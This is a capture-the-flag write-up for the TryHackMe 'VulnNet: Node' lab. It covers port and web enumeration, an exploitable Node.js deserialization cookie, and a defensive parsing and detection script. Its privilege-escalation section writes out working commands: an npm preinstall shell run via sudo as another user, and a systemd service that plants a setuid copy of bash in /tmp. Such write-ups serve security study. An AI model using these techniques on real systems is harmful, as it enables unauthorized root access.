VulnNet: Node

VulnNet Entertainment has moved its infrastructure and now they're confident that no breach will happen again. You're tasked to prove otherwise and penetrate their network.

Last updated 1 year ago

Lab Setup

mkdir ~/Documents/tryhackme/vulnnet
cd ~/Documents/tryhackme/vulnnet
mkdir recon enumeration notes
touch notes/{README.md,vuln,notes}

export IP=10.10.34.89

Enumeration

First of all, I scan the machine for open ports. I used rustscan because it is faster than nmap and lets me pass the same nmap options through to it.

rustscan -a $IP --ulimit 5000 -- -sC -sV -A -T4 

I discovered that only port 8080 is open, serving an HTTP service that appears to run on Node.js. Let's explore the website. My first step is usually a Nikto scan, since it gives comprehensive results but takes a while; in the meantime I manually check the site for default pages such as robots.txt or sitemap.xml, looking for potentially interesting information like user data, email addresses, or domain details.

nikto --host http://$IP:8080 -C all -o recon/nikto.txt

After this, I proceeded with fuzzing; however, even after changing the wordlist, I did not find any results.

feroxbuster -t 10 -u http://$IP:8080 -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o enumeration/feroxbuster

On the login page I tried some SQL injection, but without results. At this point I was stuck, until after a few minutes I remembered that I had forgotten to check the cookie. It was base64 encoded.

echo 'eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ==' | base64 -d

{"username":"Guest","isGuest":true,"encoding": "utf-8"}

So this cookie looks exploitable: the server deserializes a client-controlled object. After googling it I found a few interesting blogs that explain very well how the Node.js deserialization vulnerability works.


I used the script from the blog linked at the end of this writeup and customized it to get a reverse shell.
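The cookie decoded above is plain JSON, so the only reason it becomes dangerous is the deserializer behind it. The following is an added example, not code from the writeup or from the referenced blogs: it decodes the cookie exactly as the `base64 -d` step does, shows the hardened way to turn it back into a session object (JSON.parse with a strict schema), and adds a detection check for the `_$$ND_FUNC$$_` marker that the node-serialize package uses to tag serialized functions and evaluates in `unserialize()`. That the target uses node-serialize is an assumption taken from the referenced blogs; the second cookie value and the cookie header are constructed here only to exercise the checks.

```javascript
// Added example (not from the original writeup): decode the session cookie,
// parse it safely, and detect node-serialize function payloads in Cookie headers.
// node-serialize prefixes serialized functions with this marker and evals them
// in unserialize(); JSON.parse has no such code path.
const ND_FUNC_MARKER = '_$$ND_FUNC$$_';

// The cookie value quoted in the writeup.
const PAGE_COOKIE =
  'eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ==';

// Constructed sample: same shape as the real cookie, but the username field
// carries a serialized function (no call, just the marker plus a function body).
const CONSTRUCTED_BAD_COOKIE = Buffer.from(
  '{"username":"' + ND_FUNC_MARKER + 'function(){ return 1 }","isGuest":true}'
).toString('base64');

// Equivalent of `echo ... | base64 -d`.
function decodeCookie(b64) {
  return Buffer.from(b64, 'base64').toString('utf8');
}

// Detection: does the decoded payload carry node-serialize's function marker?
function containsSerializedFunction(decoded) {
  return decoded.includes(ND_FUNC_MARKER);
}

// Hardened server-side parsing: plain JSON, strict schema, no code execution.
function parseSession(b64) {
  const decoded = decodeCookie(b64);
  if (containsSerializedFunction(decoded)) {
    return { ok: false, reason: 'serialized function in cookie' };
  }
  let obj;
  try {
    obj = JSON.parse(decoded);
  } catch (e) {
    return { ok: false, reason: 'invalid JSON' };
  }
  if (obj === null || typeof obj !== 'object' ||
      typeof obj.username !== 'string' || typeof obj.isGuest !== 'boolean') {
    return { ok: false, reason: 'unexpected schema' };
  }
  return { ok: true, username: obj.username, isGuest: obj.isGuest };
}

// Log/WAF-side check: given a raw Cookie header value ("a=...; b=..."), return
// the names of cookies whose base64 payload contains the function marker.
function flagCookieHeader(header) {
  const names = [];
  for (const pair of header.split(';')) {
    const eq = pair.indexOf('=');
    if (eq < 0) continue;
    const name = pair.slice(0, eq).trim();
    const value = pair.slice(eq + 1).trim();
    if (containsSerializedFunction(decodeCookie(value))) names.push(name);
  }
  return names;
}

// Stand-alone demonstration.
console.log(decodeCookie(PAGE_COOKIE));
console.log(parseSession(PAGE_COOKIE));
console.log(parseSession(CONSTRUCTED_BAD_COOKIE));
console.log(flagCookieHeader('session=' + PAGE_COOKIE + '; other=' + CONSTRUCTED_BAD_COOKIE));
```

The important design choice is that `parseSession` never hands the decoded bytes to anything that can execute code; the marker check on top of it is defence in depth and doubles as a cheap signature for request logs.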

Privilege Escalation

Initially, I enumerated the permissions of the user I landed as and found that I could execute npm as another user. Consulting GTFOBins, I looked for a way to get a shell as the "serv-manage" user.

TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
chmod 777 $TF
sudo -u serv-manage /usr/bin/npm -C $TF --unsafe-perm i

The user.txt flag is in the home directory of the serv-manage user. Now let's get root.

I found that I can control a systemd timer as root through sudo, but first I need to change the contents of the vulnnet-auto.timer and vulnnet-job.service files.

  • vulnnet-auto.timer

[Unit]
Description=Run VulnNet utilities every 30 min

[Timer]
OnBootSec=0min
# run the job every minute instead of every 30 minutes
OnCalendar=*:0/1
Unit=vulnnet-job.service

[Install]
WantedBy=basic.target
  • vulnnet-job.service

[Unit]
Description=Logs system statistics to the systemd journal
Wants=vulnnet-auto.timer

[Service]
# Gather system statistics
Type=forking
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/privesc;chmod +xs /tmp/privesc'

[Install]
WantedBy=multi-user.target
  • execute commands

sudo /bin/systemctl stop vulnnet-auto.timer
sudo /bin/systemctl daemon-reload
sudo /bin/systemctl start vulnnet-auto.timer
References

  • Node.js Deserialization Attack | Exploit Notes (hideckies)
  • Exploiting Node.js deserialization bug for Remote Code Execution (OpSecX)